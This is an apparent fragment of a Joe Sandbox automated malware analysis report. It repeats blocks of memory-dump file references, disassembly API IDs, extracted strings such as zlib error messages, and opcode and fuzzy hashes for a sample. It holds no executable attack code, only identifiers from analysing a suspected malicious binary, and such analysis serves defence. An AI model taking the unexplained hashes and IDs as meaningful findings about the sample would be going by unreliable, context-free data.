                                                                                                                                                                                                                                    • Instruction ID: 13ccb4e757b9ffc75b4e9254fceb4d906dead93338128e98766b9dfeed2499e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2B1CB21B2B68241EA52BB2DD4081BBE350EB66BE4F844135DB5D4B79DFEBCE441C320
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                    • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                    • Instruction ID: 308713a4da5d1685d92c0d5a605287c72b7bd8d538c7cec2ed417b4e8e4fdc96
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E118F22B15B05C9EB009F74E8452BA73A0F72A718F440E35DB5D86768EF78D055C350
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy_s
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1502251526-0
                                                                                                                                                                                                                                    • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                    • Instruction ID: 6674aab09c704dc6316480c984b74315968bb3c931fe2d97ac1f824453a82bba
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4C1F672B1A28687D725DF19A04866BF7A1F7A5784F848138DB4E47748EF7DE801CB40
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                    • API String ID: 0-1127688429
                                                                                                                                                                                                                                    • Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                    • Instruction ID: 9519d544a518ee4dca5ddc0a5f436f4b2d20a104e5c0257c860362ffa149c546
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCF1B472A063C54AEBA7AF088088B7BFAA9EF56740F454134DB4987394EFB8E440C754
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
• Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
• Instruction ID: 14f83866e630e44966a2e4d0752a7562b65bbed4f3b9b6f03fe805cd2736a2d2
• Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
• Instruction Fuzzy Hash: FCB18E73601B898BEB16CF2DC84A36977A0F741B88F148825DB6D877A8DF79D451C710

Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: $
• API String ID: 0-227171996
• Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
• Instruction ID: 7480c3785ca2ff635151fea2c562fe786118d7bb5e08278fce2f3efbec13a686
• Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
• Instruction Fuzzy Hash: ABE1D633B0A64685E76ABE2D805113EB360FF66B48F940135DB1E077B8EF69E851C712

Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: incorrect header check$invalid window size
• API String ID: 0-900081337
• Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
• Instruction ID: 44ae3bdc00e3e1942bcf246b5ee18b918a75d078a8f7f7a6a8cdccb233fc5fbd
• Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
• Instruction Fuzzy Hash: AC91E772A0928587EBA79E18C448B7FFAA9FF51340F554139DB49867C8EF78E440CB14

Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: e+000$gfff
• API String ID: 0-3030954782
• Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
• Instruction ID: bc7aa8784db36a01178487b61938f2431c292bace0f57ab76812d45bb98e093d
• Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
• Instruction Fuzzy Hash: B9519E22B192C145E722AE3DD80176AFB91E756B90F888231CB5C4BAD9EFBDD001C711

Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: gfffffff
• API String ID: 0-1523873471
• Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
• Instruction ID: 96c1655e764d574bb2763ee2897235069cf7f855e1f4e3d92314198cd22ea40b
• Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
• Instruction Fuzzy Hash: 2EA15A62A0A7C646EB22EF2D94007AABB91EB667C4F448131DF4D477A9EFBDD401C710

Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: TMP
• API String ID: 3215553584-3125297090
• Opcode ID: 55bfb0711aaa24fc3f3c49a17a094aed8874a1becd77c64581317e125ecb5b45
• Instruction ID: 674a92ccb1bb6f05e9ea8b54dea599d2789d7cf52e8103671cbf45ffcdb440c6
• Opcode Fuzzy Hash: 55bfb0711aaa24fc3f3c49a17a094aed8874a1becd77c64581317e125ecb5b45
• Instruction Fuzzy Hash: BD51AF01F1A60241EA67BA2E59051BBD2906F66BD4FC85835DF0E477AAFEBCE401D220

APIs
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
• Instruction ID: d7353c15b0500de40410da7fcf92c45a8126f3814829bf436d0f6e323d81ce75
• Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
• Instruction Fuzzy Hash: 4CB09B10E07741C1ED463F255C8611562947F55700FD40138C14C44334ED6C10E59711
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
• Instruction ID: 738f504de11ccd57143db0460cfc711ac7e30ca989f0c576751396a2a02c9104
• Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
• Instruction Fuzzy Hash: DED1DC73B0E64245EB6ABE2D804067FA3A0AB16B48F944135CF0D077E9EFB9E441C752
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
• Instruction ID: 5523a9629e92d2c1388ac8d561d858b664e91fff399a615b4aa0b2521979a5ff
• Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
• Instruction Fuzzy Hash: ABC18E762181E08BD28AEB29E47947A73D1F78934DBD5406BEF87477C9CA3CA414DB20
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
• Instruction ID: 3294e20b93bba098900ca5a1394c69469a06395b508b134d2a6c8ab0fa5c3b10
• Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
• Instruction Fuzzy Hash: FCB1917290A74585E766AF3DC05013EBBB0E766B48FA40136CB4E473A9EFB9D441C760
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
• Instruction ID: 2075344aac207ff62ba8892727ffe1bde8dc922650f244bd0dd986f2c005e135
• Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
• Instruction Fuzzy Hash: 3E81EF72A0938146EB75AB1D944036BAA91FF66794F904235DB8D43BA9EF7CE001CB11
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
• Instruction ID: e0f95a4b8aff93ab258f607ebaa5bb1a507f024fed8d4a63e80613671f0b825e
• Opcode Fuzzy Hash: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
• Instruction Fuzzy Hash: B4611F21E0A18246F766A52C90586BFE6C0AF77760F98023DD71D4A6DDFEEDE800C720
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction ID: fefae981b72ae4a71e91d5a6934315ae2b3890c019769cad16cb2271686ec2d6
• Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction Fuzzy Hash: BF51B836A1965186E725AB2DC44023A73A1FB76B58F644135CF8C077B8EF7AE883C750
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                    • Instruction ID: 4c8d186227f9c3d97e2a18e2587745cc516e953ddf87433502e5621a78b6a1e6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7519832A2965185E725AF2DC04023A77A0EB66B58F644131CB9D177B8EF7AE843C770
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                    • Instruction ID: 67e4c806be149172f60017aace216cd8a0d175c0e94c1b356d4ef293d9ca0850
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4051BB36A2965181E725AF2DC04033A73A0EB66B58F644131CF4D177B8EFBAE853C760
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                    • Instruction ID: 14b392952cdb4479b3a6ef715c6fb6b03ade443c98f0c4bef945435587d3b9ec
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD51B936A2965185E726AF2DC04023977A0EB56B58F644131CF4C177BCEF79E842D760
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
